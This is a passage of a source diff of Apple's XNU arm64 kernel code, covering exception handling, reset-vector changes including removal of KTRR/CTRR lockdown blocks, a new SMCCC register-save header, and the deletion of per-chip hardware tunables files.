+                       return;
+               }
+
+               {
+                       /* We have to fault the page in */
+                       result = vm_fault(map, vm_fault_addr, fault_type,
+                           /* change_wiring */ FALSE, VM_KERN_MEMORY_NONE, THREAD_ABORTSAFE,
+                           /* caller_pmap */ NULL, /* caller_pmap_addr */ 0);
                }
                if (result == KERN_SUCCESS || result == KERN_ABORTED) {
                        return;
@@ -1519,7 +1525,15 @@ handle_kernel_abort(arm_saved_state_t *state, uint32_t esr, vm_offset_t fault_ad
                        interruptible = THREAD_UNINT;
                } else {
                        map = thread->map;
-                       interruptible = THREAD_ABORTSAFE;
+
+                       /**
+                        * In the case that the recovery handler is set (e.g., during copyio
+                        * and dtrace probes), we don't want the vm_fault() operation to be
+                        * aborted early. Those code paths can't handle restarting the
+                        * vm_fault() operation so don't allow it to return early without
+                        * creating the wanted mapping.
+                        */
+                       interruptible = (recover) ? THREAD_UNINT : THREAD_ABORTSAFE;
                }
 
 #if CONFIG_PGTRACE
@@ -1629,10 +1643,11 @@ handle_svc(arm_saved_state_t *state)
        mach_kauth_cred_uthread_update();
 
        if (trap_no < 0) {
-               if (trap_no == MACH_ARM_TRAP_ABSTIME) {
+               switch (trap_no) {
+               case MACH_ARM_TRAP_ABSTIME:
                        handle_mach_absolute_time_trap(state);
                        return;
-               } else if (trap_no == MACH_ARM_TRAP_CONTTIME) {
+               case MACH_ARM_TRAP_CONTTIME:
                        handle_mach_continuous_time_trap(state);
                        return;
                }
@@ -1665,6 +1680,7 @@ handle_mach_continuous_time_trap(arm_saved_state_t *state)
        saved_state64(state)->x[0] = now;
 }
 
+
 __attribute__((noreturn))
 static void
 handle_msr_trap(arm_saved_state_t *state, uint32_t esr)
@@ -1780,7 +1796,7 @@ sleh_fiq(arm_saved_state_t *state)
        uint64_t     ipi_sr = 0;
 
        if (gFastIPI) {
-               MRS(ipi_sr, ARM64_REG_IPI_SR);
+               MRS(ipi_sr, "S3_5_C15_C1_1");
 
                if (ipi_sr & 1) {
                        is_ipi = TRUE;
@@ -1802,6 +1818,7 @@ sleh_fiq(arm_saved_state_t *state)
 
        sleh_interrupt_handler_prologue(state, type);
 
+
 #if defined(HAS_IPI)
        if (is_ipi) {
                /*
@@ -1812,7 +1829,7 @@ sleh_fiq(arm_saved_state_t *state)
                 * IPI to this CPU may be lost.  ISB is required to ensure the msr
                 * is retired before execution of cpu_signal_handler().
                 */
-               MSR(ARM64_REG_IPI_SR, ipi_sr);
+               MSR("S3_5_C15_C1_1", ipi_sr);
                __builtin_arm_isb(ISB_SY);
                cpu_signal_handler();
        } else
@@ -1844,6 +1861,7 @@ sleh_fiq(arm_saved_state_t *state)
                INTERRUPT_MASKED_DEBUG_END();
        }
 
+
        sleh_interrupt_handler_epilogue();
 #if MACH_ASSERT
        if (preemption_level != get_preemption_level()) {
diff --git a/osfmk/arm64/smccc_asm.h b/osfmk/arm64/smccc_asm.h
new file mode 100644 (file)
index 0000000..1f27d8d
--- /dev/null
@@ -0,0 +1,60 @@
+/*
+ * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+
+#ifndef _ARM64_SMCCC_ASM_H_
+#define _ARM64_SMCCC_ASM_H_
+
+#ifndef __ASSEMBLER__
+#error "This header should only be used in .s files"
+#endif
+
+/*
+ * SAVE_SMCCC_CLOBBERED_REGISTERS
+ *
+ * Saves x0-x3 to stack in preparation for an hvc/smc call.
+ */
+
+.macro  SAVE_SMCCC_CLOBBERED_REGISTERS
+stp             x0, x1, [sp, #- 16]!
+stp             x2, x3, [sp, #- 16]!
+.endmacro
+
+/*
+ * LOAD_SMCCC_CLOBBERED_REGISTERS
+ *
+ * Loads x0-x3 from stack after an hvc/smc call.
+ */
+
+.macro  LOAD_SMCCC_CLOBBERED_REGISTERS
+ldp             x2, x3, [sp], #16
+ldp             x0, x1, [sp], #16
+.endmacro
+
+#endif /* _ARM64_SMCCC_ASM_H_ */
+
+/* vim: set ts=4 ft=asm: */
index 10d16d12204c42e7b4d3dd5e45ad3270c3281e02..5b64fbf5fd88a0b0fde0e862f1e9fd43173e5de4 100644 (file)
@@ -137,48 +137,6 @@ LEXT(reset_vector)
 #endif
 
 
-#if defined(KERNEL_INTEGRITY_KTRR)
-       /*
-        * Set KTRR registers immediately after wake/resume
-        *
-        * During power on reset, XNU stashed the kernel text region range values
-        * into __DATA,__const which should be protected by AMCC RoRgn at this point.
-        * Read this data and program/lock KTRR registers accordingly.
-        * If either values are zero, we're debugging kernel so skip programming KTRR.
-        */
-
-       /* refuse to boot if machine_lockdown() hasn't completed */
-       adrp    x17, EXT(lockdown_done)@page
-       ldr     w17, [x17, EXT(lockdown_done)@pageoff]
-       cbz     w17, .
-
-       // load stashed rorgn_begin
-       adrp    x17, EXT(ctrr_begin)@page
-       add             x17, x17, EXT(ctrr_begin)@pageoff
-       ldr             x17, [x17]
-#if DEBUG || DEVELOPMENT || CONFIG_DTRACE
-       // if rorgn_begin is zero, we're debugging. skip enabling ktrr
-       cbz             x17, Lskip_ktrr
-#else
-       cbz             x17, .
-#endif
-
-       // load stashed rorgn_end
-       adrp    x19, EXT(ctrr_end)@page
-       add             x19, x19, EXT(ctrr_end)@pageoff
-       ldr             x19, [x19]
-#if DEBUG || DEVELOPMENT || CONFIG_DTRACE
-       cbz             x19, Lskip_ktrr
-#else
-       cbz             x19, .
-#endif
-
-       msr             ARM64_REG_KTRR_LOWER_EL1, x17
-       msr             ARM64_REG_KTRR_UPPER_EL1, x19
-       mov             x17, #1
-       msr             ARM64_REG_KTRR_LOCK_EL1, x17
-Lskip_ktrr:
-#endif /* defined(KERNEL_INTEGRITY_KTRR) */
 
        // Process reset handlers
        adrp    x19, EXT(ResetHandlerData)@page                 // Get address of the reset handler data
@@ -203,62 +161,6 @@ Lnext_cpu_data_entry:
        b.eq    Lskip_cpu_reset_handler                         // Not found
        b               Lcheck_cpu_data_entry   // loop
 Lfound_cpu_data_entry:
-#if defined(KERNEL_INTEGRITY_CTRR)
-       /*
-        * Program and lock CTRR if this CPU is non-boot cluster master. boot cluster will be locked
-        * in machine_lockdown. pinst insns protected by VMSA_LOCK
-        * A_PXN and A_MMUON_WRPROTECT options provides something close to KTRR behavior
-        */
-
-       /* refuse to boot if machine_lockdown() hasn't completed */
-       adrp    x17, EXT(lockdown_done)@page
-       ldr     w17, [x17, EXT(lockdown_done)@pageoff]
-       cbz     w17, .
-
-       // load stashed rorgn_begin
-       adrp    x17, EXT(ctrr_begin)@page
-       add             x17, x17, EXT(ctrr_begin)@pageoff
-       ldr             x17, [x17]
-#if DEBUG || DEVELOPMENT || CONFIG_DTRACE
-       // if rorgn_begin is zero, we're debugging. skip enabling ctrr
-       cbz             x17, Lskip_ctrr
-#else
-       cbz             x17, .
-#endif
-
-       // load stashed rorgn_end
-       adrp    x19, EXT(ctrr_end)@page
-       add             x19, x19, EXT(ctrr_end)@pageoff
-       ldr             x19, [x19]
-#if DEBUG || DEVELOPMENT || CONFIG_DTRACE
-       cbz             x19, Lskip_ctrr
-#else
-       cbz             x19, .
-#endif
-
-       mrs             x18, ARM64_REG_CTRR_LOCK_EL1
-       cbnz    x18, Lskip_ctrr  /* don't touch if already locked */
-       msr             ARM64_REG_CTRR_A_LWR_EL1, x17
-       msr             ARM64_REG_CTRR_A_UPR_EL1, x19
-       mov             x18, #(CTRR_CTL_EL1_A_PXN | CTRR_CTL_EL1_A_MMUON_WRPROTECT)
-       msr             ARM64_REG_CTRR_CTL_EL1, x18
-       mov             x18, #1
-       msr             ARM64_REG_CTRR_LOCK_EL1, x18
-
-
-       isb
-       tlbi    vmalle1
-       dsb     ish
-       isb
-Lspin_ctrr_unlocked:
-       /* we shouldn't ever be here as cpu start is serialized by cluster in cpu_start(),
-        * and first core started in cluster is designated cluster master and locks
-        * both core and cluster. subsequent cores in same cluster will run locked from
-        * from reset vector */
-       mrs             x18, ARM64_REG_CTRR_LOCK_EL1
-       cbz             x18, Lspin_ctrr_unlocked
-Lskip_ctrr:
-#endif
        adrp    x20, EXT(const_boot_args)@page
        add             x20, x20, EXT(const_boot_args)@pageoff
        ldr             x0, [x21, CPU_RESET_HANDLER]            // Call CPU reset handler
@@ -780,7 +682,7 @@ common_start:
 #if defined(APPLEHURRICANE)
        // <rdar://problem/26726624> Increase Snoop reservation in EDB to reduce starvation risk
        // Needs to be done before MMU is enabled
-       HID_INSERT_BITS ARM64_REG_HID5, ARM64_REG_HID5_CrdEdbSnpRsvd_mask, ARM64_REG_HID5_CrdEdbSnpRsvd_VALUE, x12
+       HID_INSERT_BITS HID5, ARM64_REG_HID5_CrdEdbSnpRsvd_mask, ARM64_REG_HID5_CrdEdbSnpRsvd_VALUE, x12
 #endif
 
 #if defined(BCM2837)
@@ -876,36 +778,26 @@ common_start:
 
 
 #if defined(APPLE_ARM64_ARCH_FAMILY)
-       // Initialization common to all Apple targets
+       // Initialization common to all non-virtual Apple targets
        ARM64_IS_PCORE x15
-       ARM64_READ_EP_SPR x15, x12, ARM64_REG_EHID4, ARM64_REG_HID4
+       ARM64_READ_EP_SPR x15, x12, S3_0_C15_C4_1, S3_0_C15_C4_0
        orr             x12, x12, ARM64_REG_HID4_DisDcMVAOps
        orr             x12, x12, ARM64_REG_HID4_DisDcSWL2Ops
-       ARM64_WRITE_EP_SPR x15, x12, ARM64_REG_EHID4, ARM64_REG_HID4
+       ARM64_WRITE_EP_SPR x15, x12, S3_0_C15_C4_1, S3_0_C15_C4_0
 #endif  // APPLE_ARM64_ARCH_FAMILY
 
        // Read MIDR before start of per-SoC tunables
        mrs x12, MIDR_EL1
 
-#if defined(APPLELIGHTNING)
-       // Cebu <B0 is deprecated and unsupported (see rdar://problem/42835678)
-       EXEC_COREEQ_REVLO MIDR_CEBU_LIGHTNING, CPU_VERSION_B0, x12, x13
-       b .
-       EXEC_END
-       EXEC_COREEQ_REVLO MIDR_CEBU_THUNDER, CPU_VERSION_B0, x12, x13
-       b .
-       EXEC_END
-#endif
-
        APPLY_TUNABLES x12, x13
 
 
 
 #if HAS_CLUSTER
        // Unmask external IRQs if we're restarting from non-retention WFI
-       mrs             x9, ARM64_REG_CYC_OVRD
+       mrs             x9, CPU_OVRD
        and             x9, x9, #(~(ARM64_REG_CYC_OVRD_irq_mask | ARM64_REG_CYC_OVRD_fiq_mask))
-       msr             ARM64_REG_CYC_OVRD, x9
+       msr             CPU_OVRD, x9
 #endif
 
        // If x21 != 0, we're doing a warm reset, so we need to trampoline to the kernel pmap.
diff --git a/osfmk/arm64/tunables/tunables.s b/osfmk/arm64/tunables/tunables.s
deleted file mode 100644 (file)
index fd67d00..0000000
+++ /dev/null
@@ -1,47 +0,0 @@
-/*
- * Copyright (c) 2019 Apple Inc. All rights reserved.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
- *
- * This file contains Original Code and/or Modifications of Original Code
- * as defined in and that are subject to the Apple Public Source License
- * Version 2.0 (the 'License'). You may not use this file except in
- * compliance with the License. The rights granted to you under the License
- * may not be used to create, or enable the creation or redistribution of,
- * unlawful or unlicensed copies of an Apple operating system, or to
- * circumvent, violate, or enable the circumvention or violation of, any
- * terms of an Apple operating system software license agreement.
- *
- * Please obtain a copy of the License at
- * http://www.opensource.apple.com/apsl/ and read it before using this file.
- *
- * The Original Code and all software distributed under the License are
- * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
- * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
- * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
- * Please see the License for the specific language governing rights and
- * limitations under the License.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
- */
-#include <pexpert/arm64/board_config.h>
-
-#if defined(APPLETYPHOON)
-#include "tunables_h7.s"
-#elif defined(APPLETWISTER)
-#include "tunables_h8.s"
-#elif defined(APPLEHURRICANE)
-#include "tunables_h9.s"
-#elif defined(APPLEMONSOON)
-#include "tunables_h10.s"
-#elif defined(APPLEVORTEX)
-#include "tunables_h11.s"
-#elif defined(APPLELIGHTNING)
-#include "tunables_h12.s"
-#elif defined(APPLEFIRESTORM)
-#include "tunables_h13.s"
-#else
-.macro APPLY_TUNABLES
-.endmacro
-#endif
diff --git a/osfmk/arm64/tunables/tunables_h10.s b/osfmk/arm64/tunables/tunables_h10.s
deleted file mode 100644 (file)
index e246200..0000000
+++ /dev/null
@@ -1,76 +0,0 @@
-/*
- * Copyright (c) 2019 Apple Inc. All rights reserved.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
- *
- * This file contains Original Code and/or Modifications of Original Code
- * as defined in and that are subject to the Apple Public Source License
- * Version 2.0 (the 'License'). You may not use this file except in
- * compliance with the License. The rights granted to you under the License
- * may not be used to create, or enable the creation or redistribution of,
- * unlawful or unlicensed copies of an Apple operating system, or to
- * circumvent, violate, or enable the circumvention or violation of, any
- * terms of an Apple operating system software license agreement.
- *
- * Please obtain a copy of the License at
- * http://www.opensource.apple.com/apsl/ and read it before using this file.
- *
- * The Original Code and all software distributed under the License are
- * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
- * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
- * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
- * Please see the License for the specific language governing rights and
- * limitations under the License.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
- */
-.macro APPLY_TUNABLES
-       /***** Tunables that apply to all cores, all revisions *****/
-
-       // <rdar://problem/28512310> SW WAR/eval: WKdm write ack lost when bif_wke_colorWrAck_XXaH asserts concurrently for both colors
-       HID_SET_BITS ARM64_REG_HID8, ARM64_REG_HID8_WkeForceStrictOrder, $1
-
-       /***** Tunables that apply to all P cores, all revisions *****/
-       /* N/A */
-
-       /***** Tunables that apply to all E cores, all revisions *****/
-       /* N/A */
-
-       /***** Tunables that apply to specific cores, all revisions *****/
-       EXEC_COREEQ_REVALL MIDR_SKYE_MISTRAL, $0, $1
-       // <rdar://problem/30423928>: Atomic launch eligibility is erroneously taken away when a store at SMB gets invalidated
-       HID_CLEAR_BITS ARM64_REG_EHID11, ARM64_REG_EHID11_SmbDrainThresh_mask, $1
-       EXEC_END
-
-       /***** Tunables that apply to specific cores and revisions *****/
-       EXEC_COREEQ_REVLO MIDR_SKYE_MISTRAL, CPU_VERSION_B0, $0, $1
-
-       // Disable downstream fill bypass logic
-       // <rdar://problem/28545159> [Tunable] Skye - L2E fill bypass collision from both pipes to ecore
-       HID_SET_BITS ARM64_REG_EHID5, ARM64_REG_EHID5_DisFillByp, $1
-
-       // Disable forwarding of return addresses to the NFP
-       // <rdar://problem/30387067> Skye: FED incorrectly taking illegal va exception
-       HID_SET_BITS ARM64_REG_EHID0, ARM64_REG_EHID0_nfpRetFwdDisb, $1
-
-       EXEC_END
-
-       EXEC_COREALL_REVLO CPU_VERSION_B0, $0, $1
-
-       // Disable clock divider gating
-       // <rdar://problem/30854420> [Tunable/Errata][cpu_1p_1e] [CPGV2] ACC power down issue when link FSM switches from GO_DN to CANCEL and at the same time upStreamDrain request is set.
-       HID_SET_BITS ARM64_REG_HID6, ARM64_REG_HID6_DisClkDivGating, $1
-
-       // Disable clock dithering
-       // <rdar://problem/29022199> [Tunable] Skye A0: Linux: LLC PIO Errors
-       HID_SET_BITS ARM64_REG_ACC_OVRD, ARM64_REG_ACC_OVRD_dsblClkDtr, $1
-       HID_SET_BITS ARM64_REG_ACC_EBLK_OVRD, ARM64_REG_ACC_OVRD_dsblClkDtr, $1
-
-       EXEC_END
-
-       EXEC_COREALL_REVHS CPU_VERSION_B0, $0, $1
-       // <rdar://problem/32512836>: Disable refcount syncing between E and P
-       HID_INSERT_BITS ARM64_REG_CYC_OVRD, ARM64_REG_CYC_OVRD_dsblSnoopTime_mask, ARM64_REG_CYC_OVRD_dsblSnoopPTime, $1
-       EXEC_END
-.endmacro
\ No newline at end of file
diff --git a/osfmk/arm64/tunables/tunables_h11.s b/osfmk/arm64/tunables/tunables_h11.s
deleted file mode 100644 (file)
index 9fb5b0d..0000000
+++ /dev/null
@@ -1,80 +0,0 @@
-/*
- * Copyright (c) 2019 Apple Inc. All rights reserved.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
- *
- * This file contains Original Code and/or Modifications of Original Code
- * as defined in and that are subject to the Apple Public Source License
- * Version 2.0 (the 'License'). You may not use this file except in
- * compliance with the License. The rights granted to you under the License
- * may not be used to create, or enable the creation or redistribution of,
- * unlawful or unlicensed copies of an Apple operating system, or to
- * circumvent, violate, or enable the circumvention or violation of, any
- * terms of an Apple operating system software license agreement.
- *
- * Please obtain a copy of the License at
- * http://www.opensource.apple.com/apsl/ and read it before using this file.
- *
- * The Original Code and all software distributed under the License are
- * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
- * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
- * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
- * Please see the License for the specific language governing rights and
- * limitations under the License.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
- */
-.macro APPLY_TUNABLES
-       /***** Tunables that apply to all cores, all revisions *****/
-       /* N/A */
-
-       /***** Tunables that apply to all P cores, all revisions *****/
-       EXEC_PCORE_REVALL $0, $1
-       // rdar://problem/34435356: segfaults due to IEX clock-gating
-       HID_SET_BITS ARM64_REG_HID1, ARM64_REG_HID1_rccForceAllIexL3ClksOn, $1
-
-       // Prevent ordered loads from being dispatched from LSU until all prior loads have completed.
-       // rdar://problem/34095873: AF2 ordering rules allow ARM device ordering violations
-       HID_SET_BITS ARM64_REG_HID4, ARM64_REG_HID4_ForceNsOrdLdReqNoOlderLd, $1
-
-       // rdar://problem/38482968: [Cyprus Tunable] Poisoned cache line crossing younger load is not redirected by older load-barrier
-       HID_SET_BITS ARM64_REG_HID3, ARM64_REG_HID3_DisColorOpt, $1
-
-       // rdar://problem/41056604: disable faster launches of uncacheable unaligned stores to workaround load/load ordering violation
-       HID_SET_BITS ARM64_REG_HID11, ARM64_REG_HID11_DisX64NTLnchOpt, $1
-
-       EXEC_END
-
-       /***** Tunables that apply to all E cores, all revisions *****/
-       EXEC_ECORE_REVALL $0, $1
-       // Prevent ordered loads from being dispatched from LSU until all prior loads have completed.
-       // rdar://problem/34095873: AF2 ordering rules allow ARM device ordering violations
-       HID_SET_BITS ARM64_REG_EHID4, ARM64_REG_HID4_ForceNsOrdLdReqNoOlderLd, $1
-
-       // rdar://problem/36595004: Poisoned younger load is not redirected by older load-acquire
-       HID_SET_BITS ARM64_REG_EHID3, ARM64_REG_EHID3_DisColorOpt, $1
-
-       // rdar://problem/37949166: Disable the extension of prefetcher training pipe clock gating, revert to default gating
-       HID_SET_BITS ARM64_REG_EHID10, ARM64_REG_EHID10_rccDisPwrSavePrfClkOff, $1
-
-       EXEC_END
-
-       /***** Tunables that apply to specific cores, all revisions *****/
-       // Should be applied to all Aruba variants, but only Cyprus variants B0 and later
-       EXEC_COREEQ_REVALL MIDR_ARUBA_VORTEX, $0, $1
-       // rdar://problem/36716477: data corruption due to incorrect branch predictor resolution
-       HID_SET_BITS ARM64_REG_HID1, ARM64_REG_HID1_enaBrKillLimit, $1
-       EXEC_END
-
-       /***** Tunables that apply to specific cores and revisions *****/
-       EXEC_COREEQ_REVHS MIDR_CYPRUS_VORTEX, CPU_VERSION_A1, $0, $1
-       // rdar://problem/36716477: data corruption due to incorrect branch predictor resolution
-       HID_SET_BITS ARM64_REG_HID1, ARM64_REG_HID1_enaBrKillLimit, $1
-       EXEC_END
-
-       EXEC_COREEQ_REVEQ MIDR_ARUBA_VORTEX, CPU_VERSION_A1, $0, $1
-       // rdar://problem/40695685: Enable BIF fill buffer stall logic to prevent skid buffer overflow (Aruba A1 only)
-       HID_SET_BITS ARM64_REG_HID5, ARM64_REG_HID5_EnableDnFIFORdStall, $1
-       EXEC_END
-.endmacro
\ No newline at end of file
diff --git a/osfmk/arm64/tunables/tunables_h12.s b/osfmk/arm64/tunables/tunables_h12.s
deleted file mode 100644 (file)
index 7b988d0..0000000
+++ /dev/null
@@ -1,100 +0,0 @@
-/*
- * Copyright (c) 2019 Apple Inc. All rights reserved.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
- *
- * This file contains Original Code and/or Modifications of Original Code
- * as defined in and that are subject to the Apple Public Source License
- * Version 2.0 (the 'License'). You may not use this file except in
- * compliance with the License. The rights granted to you under the License
- * may not be used to create, or enable the creation or redistribution of,
- * unlawful or unlicensed copies of an Apple operating system, or to
- * circumvent, violate, or enable the circumvention or violation of, any
- * terms of an Apple operating system software license agreement.
- *
- * Please obtain a copy of the License at
- * http://www.opensource.apple.com/apsl/ and read it before using this file.
- *
- * The Original Code and all software distributed under the License are
- * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
- * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
- * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
- * Please see the License for the specific language governing rights and
- * limitations under the License.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
- */
-.macro APPLY_TUNABLES
-       /***** Tunables that apply to all cores, all revisions *****/
-       /* N/A */
-
-       /***** Tunables that apply to all P cores, all revisions *****/
-       /* N/A */
-
-       /***** Tunables that apply to all E cores, all revisions *****/
-       /* N/A */
-
-       /***** Tunables that apply to specific cores, all revisions *****/
-       EXEC_COREEQ_REVALL MIDR_CEBU_LIGHTNING, $0, $1
-       // rdar://53907283 ([Cebu ACC Errata] Sibling Merge in LLC can cause UC load to violate ARM Memory Ordering Rules.)
-       HID_SET_BITS ARM64_REG_HID5, ARM64_REG_HID5_DisFill2cMerge, $1
-
-       // rdar://problem/54615539: [Cebu ACC Tunable]Cross-beat Crypto(AES/PMUL) ICache fusion is not disabled for branch uncondtional recoded instruction.
-       HID_SET_BITS ARM64_REG_HID0, ARM64_REG_HID0_CacheFusionDisable, $1
-
-       // rdar://problem/50664291: [Cebu B0/B1 Tunables][PerfVerif][LSU] Post-silicon tuning of STNT widget contiguous counter threshold
-       HID_INSERT_BITS ARM64_REG_HID4, ARM64_REG_HID4_CnfCntrThresh_mask, ARM64_REG_HID4_CnfCntrThresh_VALUE, $1
-
-       // rdar://problem/47744434: Barrier Load Ordering property is not satisfied for x64-loads
-       HID_SET_BITS ARM64_REG_HID9, ARM64_REG_HID9_EnableFixBug47221499, $1
-
-       // rdar://problem/50664291: [Cebu B0/B1 Tunables][PerfVerif][LSU] Post-silicon tuning of STNT widget contiguous counter threshold
-       HID_SET_BITS ARM64_REG_HID9, ARM64_REG_HID9_DisSTNTWidgetForUnalign, $1
-
-       // rdar://problem/47865629: RF bank and Multipass conflict forward progress widget does not handle 3+ cycle livelock
-       HID_SET_BITS ARM64_REG_HID16, ARM64_REG_HID16_EnRs4Sec, $1
-       HID_CLEAR_BITS ARM64_REG_HID16, ARM64_REG_HID16_DisxPickRs45, $1
-       HID_SET_BITS ARM64_REG_HID16, ARM64_REG_HID16_EnMPxPick45, $1
-       HID_SET_BITS ARM64_REG_HID16, ARM64_REG_HID16_EnMPCyc7, $1
-
-       // Prevent ordered loads from being dispatched from LSU until all prior loads have completed.
-       // rdar://problem/34095873: AF2 ordering rules allow ARM device ordering violations
-       HID_SET_BITS ARM64_REG_HID4, ARM64_REG_HID4_ForceNsOrdLdReqNoOlderLd, $1
-
-       // rdar://problem/51690962: Disable Store-Non-Temporal downgrade widget
-       HID_SET_BITS ARM64_REG_HID4, ARM64_REG_HID4_DisSTNTWidget, $1
-
-       // rdar://problem/41056604: disable faster launches of uncacheable unaligned stores to workaround load/load ordering violation
-       HID_SET_BITS ARM64_REG_HID11, ARM64_REG_HID11_DisX64NTLnchOpt, $1
-
-       // rdar://problem/45024523: enable aggressive LEQ throttling to work around LEQ credit leak
-       HID_SET_BITS ARM64_REG_HID16, ARM64_REG_HID16_leqThrottleAggr, $1
-
-       // rdar://problem/41029832: configure dummy cycles to work around incorrect temp sensor readings on NEX power gating
-       HID_INSERT_BITS ARM64_REG_HID13, ARM64_REG_HID13_PreCyc_mask, ARM64_REG_HID13_PreCyc_VALUE, $1
-       EXEC_END
-
-       EXEC_COREEQ_REVALL MIDR_CEBU_THUNDER, $0, $1
-       // rdar://53907283 ([Cebu ACC Errata] Sibling Merge in LLC can cause UC load to violate ARM Memory Ordering Rules.)
-       HID_SET_BITS ARM64_REG_HID5, ARM64_REG_HID5_DisFill2cMerge, $1
-
-       // rdar://problem/48476033: Prevent store-to-load forwarding for UC memory to avoid barrier ordering violation
-       HID_SET_BITS ARM64_REG_EHID10, ARM64_REG_EHID10_ForceWStDrainUc, $1
-
-       // Prevent ordered loads from being dispatched from LSU until all prior loads have completed.
-       // rdar://problem/34095873: AF2 ordering rules allow ARM device ordering violations
-       HID_SET_BITS ARM64_REG_EHID4, ARM64_REG_HID4_ForceNsOrdLdReqNoOlderLd, $1
-
-       // rdar://problem/37949166: Disable the extension of prefetcher training pipe clock gating, revert to default gating
-       HID_SET_BITS ARM64_REG_EHID10, ARM64_REG_EHID10_rccDisPwrSavePrfClkOff, $1
-       EXEC_END
-
-       EXEC_COREEQ_REVALL MIDR_TURKS, $0, $1
-       // rdar://problem/53506680: [MP_CHECKER] Load STLFs from a completed UC/NC/NT store causing barrier ordering violation
-       HID_SET_BITS ARM64_REG_EHID10, ARM64_REG_EHID10_ForceWStDrainUc, $1
-       EXEC_END
-
-       /***** Tunables that apply to specific cores and revisions *****/
-       /* N/A */
-.endmacro
\ No newline at end of file
diff --git a/osfmk/arm64/tunables/tunables_h13.s b/osfmk/arm64/tunables/tunables_h13.s
deleted file mode 100644 (file)
index d6c12f2..0000000
+++ /dev/null
@@ -1,29 +0,0 @@
-/*
- * Copyright (c) 2019 Apple Inc. All rights reserved.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
- *
- * This file contains Original Code and/or Modifications of Original Code
- * as defined in and that are subject to the Apple Public Source License
- * Version 2.0 (the 'License'). You may not use this file except in
- * compliance with the License. The rights granted to you under the License
- * may not be used to create, or enable the creation or redistribution of,
- * unlawful or unlicensed copies of an Apple operating system, or to
- * circumvent, violate, or enable the circumvention or violation of, any
- * terms of an Apple operating system software license agreement.
- *
- * Please obtain a copy of the License at
- * http://www.opensource.apple.com/apsl/ and read it before using this file.
- *
- * The Original Code and all software distributed under the License are
- * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
- * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
- * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
- * Please see the License for the specific language governing rights and
- * limitations under the License.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
- */
-.macro APPLY_TUNABLES
-.endmacro
diff --git a/osfmk/arm64/tunables/tunables_h7.s b/osfmk/arm64/tunables/tunables_h7.s
deleted file mode 100644 (file)
index d239bb9..0000000
+++ /dev/null
@@ -1,57 +0,0 @@
-/*
- * Copyright (c) 2019 Apple Inc. All rights reserved.
- *
- * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
- *
- * This file contains Original Code and/or Modifications of Original Code
- * as defined in and that are subject to the Apple Public Source License
- * Version 2.0 (the 'License'). You may not use this file except in
- * compliance with the License. The rights granted to you under the License
- * may not be used to create, or enable the creation or redistribution of,
- * unlawful or unlicensed copies of an Apple operating system, or to
- * circumvent, violate, or enable the circumvention or violation of, any
- * terms of an Apple operating system software license agreement.
- *
- * Please obtain a copy of the License at
- * http://www.opensource.apple.com/apsl/ and read it before using this file.
- *
- * The Original Code and all software distributed under the License are
- * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
- * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
